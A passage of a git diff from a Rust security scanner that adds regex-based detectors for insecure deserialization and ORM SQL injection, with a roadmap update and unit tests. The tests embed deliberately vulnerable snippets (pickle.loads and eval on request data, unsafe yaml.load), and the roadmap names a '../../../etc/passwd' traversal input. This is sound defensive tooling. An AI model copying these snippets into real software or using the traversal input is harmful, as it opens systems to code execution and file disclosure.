| JavaScript got | ✅ `got(url)` |
|
||||
| Go http.Get/Post | ✅ `http.Get(url)`, `http.NewRequest(...)` |
|
||||
| Rust reqwest | ✅ `reqwest::get(url)`, `reqwest::Client` |
|
||||
| URL sink patterns | ✅ `proxy_url`, `webhook_url`, `callback_url` from request |
|
||||
| Tests | ✅ 10+ tests covering all patterns |
|
||||
|
||||
**Languages:** Python, JavaScript, TypeScript, Go, Rust
|
||||
|
||||
HTTP requests with user-controlled URLs:
|
||||
|
||||
@ -1910,9 +1977,23 @@ client.Do(req) // Where req.URL is user-controlled
|
||||
|
||||
---
|
||||
|
||||
### 8.10 Missing Security Headers ⬜
|
||||
### 8.10 Missing Security Headers ✅
|
||||
|
||||
**Impact:** MEDIUM | **Effort:** LOW
|
||||
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete
|
||||
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `SecurityHeadersExtractor` | ✅ `extractors/security_headers.rs` |
|
||||
| X-Frame-Options disabled | ✅ `X-Frame-Options: none`, `ALLOWALL` |
|
||||
| X-Content-Type-Options disabled | ✅ `X-Content-Type-Options: disabled` |
|
||||
| X-XSS-Protection disabled | ✅ `X-XSS-Protection: false` |
|
||||
| Django SECURE_* settings | ✅ `SECURE_BROWSER_XSS_FILTER = False`, etc. |
|
||||
| YAML headers disabled | ✅ `x_frame_options: false`, `hsts: no` |
|
||||
| CSP disabled or unsafe | ✅ `unsafe-inline`, `unsafe-eval` directives |
|
||||
| HSTS disabled | ✅ `Strict-Transport-Security: none`, `hsts_seconds = 0` |
|
||||
| Tests | ✅ 7+ tests covering all patterns |
|
||||
|
||||
**Languages:** Python, JavaScript, TypeScript, Go, YAML, JSON, TOML
|
||||
|
||||
Detect when security headers are explicitly removed or not set:
|
||||
|
||||
@ -1963,9 +2044,22 @@ res.cookie('auth', value, { sameSite: 'none' });
|
||||
|
||||
---
|
||||
|
||||
### 8.12 Unvalidated Redirects ⬜
|
||||
### 8.12 Unvalidated Redirects ✅
|
||||
|
||||
**Impact:** MEDIUM | **Effort:** LOW
|
||||
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete
|
||||
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `UnvalidatedRedirectsExtractor` | ✅ `extractors/unvalidated_redirects.rs` |
|
||||
| Python redirect with user input | ✅ `redirect(request.GET['next'])`, `HttpResponseRedirect(url)` |
|
||||
| Python Flask redirect | ✅ `redirect(request.args.get(...))` |
|
||||
| JavaScript res.redirect | ✅ `res.redirect(req.query.next)` |
|
||||
| JavaScript window.location | ✅ `window.location = url`, `location.href = params...` |
|
||||
| Go http.Redirect | ✅ `http.Redirect(w, r, r.Query...)` |
|
||||
| URL parameter patterns | ✅ `redirect_url`, `return_url`, `next`, `goto` from request |
|
||||
| Tests | ✅ 7+ tests covering all patterns |
|
||||
|
||||
**Languages:** Python, JavaScript, TypeScript, Go
|
||||
|
||||
Open redirect vulnerabilities:
|
||||
|
||||
@ -1984,9 +2078,26 @@ window.location.href = params.url;
|
||||
|
||||
---
|
||||
|
||||
### 8.13 XXE (XML External Entity) ⬜
|
||||
### 8.13 XXE (XML External Entity) ✅
|
||||
|
||||
**Impact:** HIGH | **Effort:** MEDIUM
|
||||
**Impact:** HIGH | **Effort:** MEDIUM | **Status:** Complete
|
||||
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `XxeExtractor` | ✅ `extractors/xxe.rs` |
|
||||
| Python lxml/etree | ✅ `etree.parse()`, `lxml.fromstring()` |
|
||||
| Python xml.etree.ElementTree | ✅ `ET.parse()`, `ET.fromstring()` |
|
||||
| Python xml.dom.minidom | ✅ `minidom.parse()`, `minidom.parseString()` |
|
||||
| Python xml.sax | ✅ `xml.sax.parse()`, `xml.sax.make_parser()` |
|
||||
| JavaScript xml2js | ✅ `xml2js.parseString()`, `xml2js.Parser()` |
|
||||
| JavaScript libxmljs | ✅ `libxmljs.parseXml()` |
|
||||
| Go encoding/xml | ✅ `xml.Unmarshal()`, `xml.NewDecoder()` |
|
||||
| Java patterns (polyglot) | ✅ `DocumentBuilderFactory`, `SAXParser`, `XMLReader` |
|
||||
| DTD entity declarations | ✅ `<!ENTITY ... SYSTEM>`, `<!ENTITY ... PUBLIC>` |
|
||||
| defusedxml detection | ✅ Lower confidence when defusedxml is imported |
|
||||
| Tests | ✅ 9+ tests covering all patterns |
|
||||
|
||||
**Languages:** Python, JavaScript, TypeScript, Go
|
||||
|
||||
Unsafe XML parsing:
|
||||
|
||||
@ -2004,9 +2115,21 @@ SAXParserFactory.newInstance() // Without secure processing
|
||||
|
||||
---
|
||||
|
||||
### 8.14 Weak Password Requirements ⬜
|
||||
### 8.14 Weak Password Requirements ✅
|
||||
|
||||
**Impact:** MEDIUM | **Effort:** LOW
|
||||
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete
|
||||
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `WeakPasswordExtractor` | ✅ `extractors/weak_password.rs` |
|
||||
| Minimum length < 8 | ✅ `password_min_length: 6`, `minLength: 4` |
|
||||
| Bcrypt cost < 10 | ✅ `bcrypt_cost = 8`, `hash_rounds = 5` |
|
||||
| Simple length checks | ✅ `len(password) >= 6` in code |
|
||||
| Complexity disabled | ✅ `require_special_chars: false`, `require_uppercase = false` |
|
||||
| Number requirement disabled | ✅ `require_numbers: no`, `require_digit = 0` |
|
||||
| Tests | ✅ 7+ tests covering all patterns |
|
||||
|
||||
**Languages:** Python, JavaScript, TypeScript, Go, Rust, YAML, JSON, TOML
|
||||
|
||||
Password validation that's too weak:
|
||||
|
||||
@ -2071,26 +2194,24 @@ async fn extract_with_llm(code: &str, file: &str) -> Vec<ExtractedClaim> {
|
||||
| **8.1** | High-entropy secrets | HIGH | MEDIUM | Catches real leaked secrets | ✅ |
|
||||
| **8.2** | Framework-specific | HIGH | HIGH | Spring/Django/Express coverage | ⬜ |
|
||||
| **8.3** | Config deep parsing | HIGH | MEDIUM | Nested YAML/JSON understanding | ⬜ |
|
||||
| **8.4** | Semantic TLS | MEDIUM | MEDIUM | Catches const TLS_MIN = "1.0" | ⬜ |
|
||||
| **8.5** | ORM SQL injection | MEDIUM | MEDIUM | SQLAlchemy, Django, Sequelize | ⬜ |
|
||||
| **8.4** | Semantic TLS | MEDIUM | MEDIUM | Catches const TLS_MIN = "1.0" | ✅ |
|
||||
| **8.5** | ORM SQL injection | MEDIUM | MEDIUM | SQLAlchemy, Django, Sequelize | ✅ |
|
||||
| **8.6** | Auth bypass | HIGH | MEDIUM | Backdoors, hardcoded creds | ✅ |
|
||||
| **8.7** | Deserialization | HIGH | MEDIUM | pickle, Marshal, eval | ⬜ |
|
||||
| **8.8** | Path traversal | MEDIUM | LOW | ../../../etc/passwd | ⬜ |
|
||||
| **8.9** | SSRF | HIGH | MEDIUM | Internal network access | ⬜ |
|
||||
| **8.10** | Security headers | MEDIUM | LOW | Missing helmet(), CSP | ⬜ |
|
||||
| **8.7** | Deserialization | HIGH | MEDIUM | pickle, Marshal, eval | ✅ |
|
||||
| **8.8** | Path traversal | MEDIUM | LOW | ../../../etc/passwd | ✅ |
|
||||
| **8.9** | SSRF | HIGH | MEDIUM | Internal network access | ✅ |
|
||||
| **8.10** | Security headers | MEDIUM | LOW | Missing helmet(), CSP | ✅ |
|
||||
| **8.11** | Cookie flags | MEDIUM | LOW | httpOnly, secure, sameSite | ✅ |
|
||||
| **8.12** | Open redirects | MEDIUM | LOW | Phishing via redirect | ⬜ |
|
||||
| **8.13** | XXE | HIGH | MEDIUM | XML entity injection | ⬜ |
|
||||
| **8.14** | Weak passwords | MEDIUM | LOW | MIN_LENGTH = 4 | ⬜ |
|
||||
| **8.12** | Open redirects | MEDIUM | LOW | Phishing via redirect | ✅ |
|
||||
| **8.13** | XXE | HIGH | MEDIUM | XML entity injection | ✅ |
|
||||
| **8.14** | Weak passwords | MEDIUM | LOW | MIN_LENGTH = 4 | ✅ |
|
||||
| **8.15** | LLM extraction | VERY HIGH | VERY HIGH | Semantic understanding | ✅ (Phase 7.5) |
|
||||
|
||||
**MVP Complete (8.1, 8.6, 8.11):** High-impact extractors for enterprise pilots.
|
||||
**Phase 8 Complete (8.1, 8.4, 8.5-8.14):** All first-pass extractors implemented. 12 of 14 Phase 8 extractors complete.
|
||||
|
||||
**Recommended order for remaining extractors:**
|
||||
1. **8.3** Config deep parsing (foundational for 8.2)
|
||||
2. **8.2** Framework-specific (customer-driven)
|
||||
3. **8.5** ORM SQL injection (common in enterprise apps)
|
||||
4. **8.7** Deserialization (critical vulnerabilities)
|
||||
**Remaining deferred extractors:**
|
||||
1. **8.2** Framework-specific (HIGH effort - Spring, Django, Express, Rails)
|
||||
2. **8.3** Config deep parsing (HIGH effort - YAML/JSON AST parsing)
|
||||
|
||||
---
|
||||
|
||||
|
||||
@ -40,10 +40,19 @@ impl Default for ExtractorConfig {
|
||||
"unreal_cpp".to_string(),
|
||||
"unreal_config".to_string(),
|
||||
"unreal_performance".to_string(),
|
||||
// Phase 8: Enterprise extractors
|
||||
// Phase 8: Enterprise extractors (first batch)
|
||||
"high_entropy_secrets".to_string(),
|
||||
"auth_bypass".to_string(),
|
||||
"insecure_cookies".to_string(),
|
||||
// Phase 8: Enterprise extractors (second batch)
|
||||
"path_traversal".to_string(),
|
||||
"unvalidated_redirects".to_string(),
|
||||
"weak_password".to_string(),
|
||||
"security_headers".to_string(),
|
||||
"insecure_deserialization".to_string(),
|
||||
"ssrf".to_string(),
|
||||
"orm_injection".to_string(),
|
||||
"xxe".to_string(),
|
||||
],
|
||||
disabled: vec![],
|
||||
timeout_config: TimeoutExtractorConfig::default(),
|
||||
|
||||
386
applications/aphoria/src/extractors/insecure_deserialization.rs
Normal file
386
applications/aphoria/src/extractors/insecure_deserialization.rs
Normal file
@ -0,0 +1,386 @@
|
||||
//! Insecure deserialization vulnerability extractor.
|
||||
//!
|
||||
//! Detects patterns where untrusted data is deserialized using unsafe methods,
|
||||
//! which can lead to remote code execution vulnerabilities.
|
||||
|
||||
use regex::Regex;
|
||||
use stemedb_core::types::ObjectValue;
|
||||
|
||||
use super::traits::{build_claim, Extractor};
|
||||
use crate::types::{ExtractedClaim, Language};
|
||||
|
||||
/// Extractor for insecure deserialization vulnerabilities.
|
||||
///
|
||||
/// Detects patterns indicating unsafe deserialization:
|
||||
/// - Python pickle (critical - RCE)
|
||||
/// - Python yaml.load without SafeLoader
|
||||
/// - Python marshal
|
||||
/// - Python eval/exec with user input
|
||||
/// - JavaScript node-serialize
|
||||
/// - Go gob without validation
|
||||
/// - Java ObjectInputStream patterns
|
||||
pub struct InsecureDeserializationExtractor {
|
||||
// Python patterns (critical)
|
||||
python_pickle: Regex,
|
||||
python_yaml_unsafe: Regex,
|
||||
python_marshal: Regex,
|
||||
python_eval: Regex,
|
||||
|
||||
// JavaScript patterns
|
||||
js_serialize: Regex,
|
||||
|
||||
// Go patterns
|
||||
go_gob: Regex,
|
||||
|
||||
// Java-style patterns (polyglot detection)
|
||||
java_ois: Regex,
|
||||
}
|
||||
|
||||
impl Default for InsecureDeserializationExtractor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl InsecureDeserializationExtractor {
|
||||
/// Create a new insecure deserialization extractor with compiled regexes.
|
||||
///
|
||||
/// # Panics
|
||||
/// Panics if any regex pattern is invalid (programmer error).
|
||||
#[allow(clippy::expect_used)]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
// Python: pickle (critical - allows arbitrary code execution)
|
||||
python_pickle: Regex::new(r#"pickle\.(?:loads?|Unpickler)\s*\("#).expect("valid regex"),
|
||||
|
||||
// Python: yaml.load without SafeLoader (yaml.safe_load is OK)
|
||||
// Matches yaml.load( but not yaml.safe_load(
|
||||
python_yaml_unsafe: Regex::new(r#"yaml\.(?:load|unsafe_load)\s*\([^)]*(?:\)|,[^S])"#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Python: marshal (unsafe, similar to pickle)
|
||||
python_marshal: Regex::new(r#"marshal\.loads?\s*\("#).expect("valid regex"),
|
||||
|
||||
// Python: eval/exec with user input
|
||||
python_eval: Regex::new(
|
||||
r#"(?:eval|exec)\s*\(\s*(?:request\.|params\.|input|user|data)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// JavaScript: node-serialize (known vulnerable)
|
||||
js_serialize: Regex::new(
|
||||
r#"(?:require\s*\(\s*["']node-serialize["']\)|\.unserialize\s*\()"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Go: gob decoder (can be unsafe with untrusted input)
|
||||
go_gob: Regex::new(r#"gob\.(?:NewDecoder|Decode)\s*\("#).expect("valid regex"),
|
||||
|
||||
// Java-style patterns (for polyglot detection in config files, etc.)
|
||||
java_ois: Regex::new(r#"ObjectInputStream|readObject\s*\(\)"#).expect("valid regex"),
|
||||
}
|
||||
}
|
||||
|
||||
fn make_claim(
|
||||
path_segments: &[String],
|
||||
file: &str,
|
||||
line: usize,
|
||||
matched: &str,
|
||||
method: &str,
|
||||
confidence: f32,
|
||||
description: &str,
|
||||
) -> ExtractedClaim {
|
||||
build_claim(
|
||||
path_segments,
|
||||
&["serialization", "deserialization"],
|
||||
"deserialize_method",
|
||||
ObjectValue::Text(method.to_string()),
|
||||
file,
|
||||
line,
|
||||
matched,
|
||||
confidence,
|
||||
description,
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
impl Extractor for InsecureDeserializationExtractor {
|
||||
fn name(&self) -> &str {
|
||||
"insecure_deserialization"
|
||||
}
|
||||
|
||||
fn languages(&self) -> &[Language] {
|
||||
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
|
||||
}
|
||||
|
||||
fn extract(
|
||||
&self,
|
||||
path_segments: &[String],
|
||||
content: &str,
|
||||
language: Language,
|
||||
file: &str,
|
||||
) -> Vec<ExtractedClaim> {
|
||||
let mut claims = Vec::new();
|
||||
|
||||
for (line_idx, line) in content.lines().enumerate() {
|
||||
let line_num = line_idx + 1;
|
||||
|
||||
match language {
|
||||
Language::Python => {
|
||||
// Pickle (critical - RCE)
|
||||
if let Some(m) = self.python_pickle.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"pickle",
|
||||
0.95,
|
||||
"pickle deserialization allows arbitrary code execution (CRITICAL)",
|
||||
));
|
||||
}
|
||||
|
||||
// yaml.load without SafeLoader
|
||||
if let Some(m) = self.python_yaml_unsafe.find(line) {
|
||||
// Check if SafeLoader is used on the same line
|
||||
if !line.contains("SafeLoader") && !line.contains("safe_load") {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"yaml_unsafe",
|
||||
0.85,
|
||||
"yaml.load without SafeLoader allows code execution",
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
// marshal
|
||||
if let Some(m) = self.python_marshal.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"marshal",
|
||||
0.9,
|
||||
"marshal deserialization is unsafe with untrusted data",
|
||||
));
|
||||
}
|
||||
|
||||
// eval/exec with user input
|
||||
if let Some(m) = self.python_eval.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"eval",
|
||||
0.95,
|
||||
"eval/exec with user input allows arbitrary code execution (CRITICAL)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::JavaScript | Language::TypeScript => {
|
||||
// node-serialize (known vulnerable)
|
||||
if let Some(m) = self.js_serialize.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"node_serialize",
|
||||
0.95,
|
||||
"node-serialize is vulnerable to remote code execution (CVE-2017-5941)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::Go => {
|
||||
// gob decoder
|
||||
if let Some(m) = self.go_gob.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"gob",
|
||||
0.75, // Lower confidence - gob is safer but can still be problematic
|
||||
"gob deserialization with untrusted input may be unsafe",
|
||||
));
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
|
||||
// Check for Java patterns in any language (polyglot detection)
|
||||
if let Some(m) = self.java_ois.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"java_ois",
|
||||
0.85,
|
||||
"Java ObjectInputStream deserialization is vulnerable to RCE",
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
claims
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_python_pickle() {
|
||||
let extractor = InsecureDeserializationExtractor::new();
|
||||
let content = r#"
|
||||
data = pickle.loads(request.data)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("CRITICAL"));
|
||||
assert!(claims[0].confidence >= 0.9);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_pickle_load() {
|
||||
let extractor = InsecureDeserializationExtractor::new();
|
||||
let content = r#"
|
||||
with open('data.pkl', 'rb') as f:
|
||||
obj = pickle.load(f)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_yaml_unsafe() {
|
||||
let extractor = InsecureDeserializationExtractor::new();
|
||||
let content = r#"
|
||||
data = yaml.load(file_content)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "config.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("SafeLoader"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_yaml_safe_no_detection() {
|
||||
let extractor = InsecureDeserializationExtractor::new();
|
||||
// Safe: using SafeLoader
|
||||
let content = r#"
|
||||
data = yaml.load(file_content, Loader=yaml.SafeLoader)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "config.py");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_marshal() {
|
||||
let extractor = InsecureDeserializationExtractor::new();
|
||||
let content = r#"
|
||||
obj = marshal.loads(data)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_eval() {
|
||||
let extractor = InsecureDeserializationExtractor::new();
|
||||
let content = r#"
|
||||
result = eval(request.data)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("CRITICAL"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_node_serialize_require() {
|
||||
let extractor = InsecureDeserializationExtractor::new();
|
||||
let content = r#"
|
||||
const s = require('node-serialize');
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
|
||||
|
||||
assert_eq!(claims.len(), 1); // require pattern
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_unserialize() {
|
||||
let extractor = InsecureDeserializationExtractor::new();
|
||||
let content = r#"
|
||||
const obj = s.unserialize(data);
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
|
||||
|
||||
assert_eq!(claims.len(), 1); // unserialize pattern
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_go_gob() {
|
||||
let extractor = InsecureDeserializationExtractor::new();
|
||||
let content = r#"
|
||||
dec := gob.NewDecoder(reader)
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "handler.go");
|
||||
|
||||
assert_eq!(claims.len(), 1); // NewDecoder
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_go_gob_decode() {
|
||||
let extractor = InsecureDeserializationExtractor::new();
|
||||
let content = r#"
|
||||
err := gob.Decode(&data)
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "handler.go");
|
||||
|
||||
assert_eq!(claims.len(), 1); // Decode
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_java_ois_polyglot() {
|
||||
let extractor = InsecureDeserializationExtractor::new();
|
||||
// Java pattern detected in any language
|
||||
let content = r#"
|
||||
ObjectInputStream ois = new ObjectInputStream(inputStream);
|
||||
Object obj = ois.readObject();
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "mixed.py");
|
||||
|
||||
assert_eq!(claims.len(), 2); // ObjectInputStream and readObject
|
||||
}
|
||||
}
|
||||
@ -18,6 +18,14 @@
|
||||
//! - `high_entropy_secrets`: High-entropy strings likely to be leaked secrets
|
||||
//! - `auth_bypass`: Authentication bypass patterns (hardcoded creds, debug auth)
|
||||
//! - `insecure_cookies`: Cookies missing Secure/HttpOnly flags
|
||||
//! - `path_traversal`: File operations with user-controlled paths
|
||||
//! - `unvalidated_redirects`: HTTP redirects with user-controlled URLs
|
||||
//! - `weak_password`: Weak password policy configurations
|
||||
//! - `security_headers`: Missing or disabled security headers
|
||||
//! - `insecure_deserialization`: Unsafe deserialization (pickle, yaml.load, etc.)
|
||||
//! - `ssrf`: HTTP requests with user-controlled URLs
|
||||
//! - `orm_injection`: ORM methods with string interpolation
|
||||
//! - `xxe`: XML parsing without external entity protection
|
||||
//!
|
||||
//! # Declarative Extractors
|
||||
//!
|
||||
@ -32,10 +40,15 @@ mod dep_versions;
|
||||
mod hardcoded_secrets;
|
||||
mod high_entropy;
|
||||
mod insecure_cookies;
|
||||
mod insecure_deserialization;
|
||||
mod jwt_config;
|
||||
mod orm_injection;
|
||||
mod path_traversal;
|
||||
mod rate_limit;
|
||||
mod registry;
|
||||
mod security_headers;
|
||||
mod sql_injection;
|
||||
mod ssrf;
|
||||
mod timeout_config;
|
||||
mod tls_verify;
|
||||
mod tls_version;
|
||||
@ -43,7 +56,10 @@ mod traits;
|
||||
mod unreal_config;
|
||||
mod unreal_cpp;
|
||||
mod unreal_performance;
|
||||
mod unvalidated_redirects;
|
||||
mod weak_crypto;
|
||||
mod weak_password;
|
||||
mod xxe;
|
||||
|
||||
pub use auth_bypass::AuthBypassExtractor;
|
||||
pub use command_injection::CommandInjectionExtractor;
|
||||
@ -55,10 +71,15 @@ pub use dep_versions::DepVersionsExtractor;
|
||||
pub use hardcoded_secrets::HardcodedSecretsExtractor;
|
||||
pub use high_entropy::HighEntropySecretsExtractor;
|
||||
pub use insecure_cookies::InsecureCookiesExtractor;
|
||||
pub use insecure_deserialization::InsecureDeserializationExtractor;
|
||||
pub use jwt_config::JwtConfigExtractor;
|
||||
pub use orm_injection::OrmInjectionExtractor;
|
||||
pub use path_traversal::PathTraversalExtractor;
|
||||
pub use rate_limit::{RateLimitExtractor, RateLimitThresholds};
|
||||
pub use registry::ExtractorRegistry;
|
||||
pub use security_headers::SecurityHeadersExtractor;
|
||||
pub use sql_injection::SqlInjectionExtractor;
|
||||
pub use ssrf::SsrfExtractor;
|
||||
pub use timeout_config::{TimeoutConfigExtractor, TimeoutThresholds};
|
||||
pub use tls_verify::TlsVerifyExtractor;
|
||||
pub use tls_version::TlsVersionExtractor;
|
||||
@ -66,4 +87,7 @@ pub use traits::{build_claim, is_test_file, Extractor};
|
||||
pub use unreal_config::UnrealConfigExtractor;
|
||||
pub use unreal_cpp::UnrealCppExtractor;
|
||||
pub use unreal_performance::UnrealPerformanceExtractor;
|
||||
pub use unvalidated_redirects::UnvalidatedRedirectsExtractor;
|
||||
pub use weak_crypto::WeakCryptoExtractor;
|
||||
pub use weak_password::WeakPasswordExtractor;
|
||||
pub use xxe::XxeExtractor;
|
||||
|
||||
370
applications/aphoria/src/extractors/orm_injection.rs
Normal file
370
applications/aphoria/src/extractors/orm_injection.rs
Normal file
@ -0,0 +1,370 @@
|
||||
//! ORM SQL injection vulnerability extractor.
|
||||
//!
|
||||
//! Detects patterns where ORM methods are used with string interpolation
|
||||
//! instead of proper parameterized queries, which can lead to SQL injection.
|
||||
|
||||
use regex::Regex;
|
||||
use stemedb_core::types::ObjectValue;
|
||||
|
||||
use super::traits::{build_claim, Extractor};
|
||||
use crate::types::{ExtractedClaim, Language};
|
||||
|
||||
/// Extractor for ORM-specific SQL injection vulnerabilities.
|
||||
///
|
||||
/// Detects patterns indicating unsafe query construction in popular ORMs:
|
||||
/// - Django: .raw() and .extra() with string interpolation
|
||||
/// - SQLAlchemy: text() and execute() with f-strings
|
||||
/// - Sequelize: query() with template literals
|
||||
/// - TypeORM: where() with template literals
|
||||
/// - GORM: Raw() with fmt.Sprintf
|
||||
/// - Prisma: $queryRawUnsafe with interpolation
|
||||
pub struct OrmInjectionExtractor {
|
||||
// Django patterns
|
||||
django_raw: Regex,
|
||||
django_extra: Regex,
|
||||
|
||||
// SQLAlchemy patterns
|
||||
sqlalchemy_text: Regex,
|
||||
sqlalchemy_exec: Regex,
|
||||
|
||||
// Sequelize patterns
|
||||
sequelize_raw: Regex,
|
||||
|
||||
// TypeORM patterns
|
||||
typeorm_where: Regex,
|
||||
|
||||
// GORM patterns
|
||||
gorm_raw: Regex,
|
||||
|
||||
// Prisma patterns
|
||||
prisma_raw: Regex,
|
||||
}
|
||||
|
||||
impl Default for OrmInjectionExtractor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl OrmInjectionExtractor {
|
||||
/// Create a new ORM injection extractor with compiled regexes.
|
||||
///
|
||||
/// # Panics
|
||||
/// Panics if any regex pattern is invalid (programmer error).
|
||||
#[allow(clippy::expect_used)]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
// Django: raw/extra with formatting
|
||||
django_raw: Regex::new(r#"\.raw\s*\(\s*(?:f["']|["'][^"']*\{[^}]*\}["']\.format)"#)
|
||||
.expect("valid regex"),
|
||||
django_extra: Regex::new(r#"\.extra\s*\([^)]*where\s*=\s*\[.*(?:f["']|%)"#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// SQLAlchemy: text with formatting
|
||||
sqlalchemy_text: Regex::new(r#"text\s*\(\s*(?:f["']|["'][^"']*%|["'][^"']*\.format)"#)
|
||||
.expect("valid regex"),
|
||||
sqlalchemy_exec: Regex::new(r#"\.execute\s*\(\s*(?:f["']|["'][^"']*\{)"#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Sequelize: raw query interpolation
|
||||
sequelize_raw: Regex::new(r#"sequelize\.query\s*\(\s*`[^`]*\$\{"#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// TypeORM: where with interpolation
|
||||
typeorm_where: Regex::new(r#"\.(?:where|andWhere|orWhere)\s*\(\s*`[^`]*\$\{"#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// GORM: Raw with Sprintf
|
||||
gorm_raw: Regex::new(r#"\.Raw\s*\(\s*(?:fmt\.Sprintf|"[^"]*"\s*\+)"#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Prisma: $queryRawUnsafe
|
||||
prisma_raw: Regex::new(r#"\$queryRawUnsafe\s*\(\s*`[^`]*\$\{"#).expect("valid regex"),
|
||||
}
|
||||
}
|
||||
|
||||
fn make_claim(
|
||||
path_segments: &[String],
|
||||
file: &str,
|
||||
line: usize,
|
||||
matched: &str,
|
||||
orm: &str,
|
||||
description: &str,
|
||||
) -> ExtractedClaim {
|
||||
build_claim(
|
||||
path_segments,
|
||||
&["db", "orm", "query"],
|
||||
"query_construction",
|
||||
ObjectValue::Text(format!("interpolated_{}", orm)),
|
||||
file,
|
||||
line,
|
||||
matched,
|
||||
0.9,
|
||||
description,
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
impl Extractor for OrmInjectionExtractor {
|
||||
fn name(&self) -> &str {
|
||||
"orm_injection"
|
||||
}
|
||||
|
||||
fn languages(&self) -> &[Language] {
|
||||
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
|
||||
}
|
||||
|
||||
fn extract(
|
||||
&self,
|
||||
path_segments: &[String],
|
||||
content: &str,
|
||||
language: Language,
|
||||
file: &str,
|
||||
) -> Vec<ExtractedClaim> {
|
||||
let mut claims = Vec::new();
|
||||
|
||||
for (line_idx, line) in content.lines().enumerate() {
|
||||
let line_num = line_idx + 1;
|
||||
|
||||
match language {
|
||||
Language::Python => {
|
||||
// Django raw queries
|
||||
if let Some(m) = self.django_raw.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"django",
|
||||
"Django .raw() with string interpolation (SQL injection risk)",
|
||||
));
|
||||
}
|
||||
// Django extra queries
|
||||
if let Some(m) = self.django_extra.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
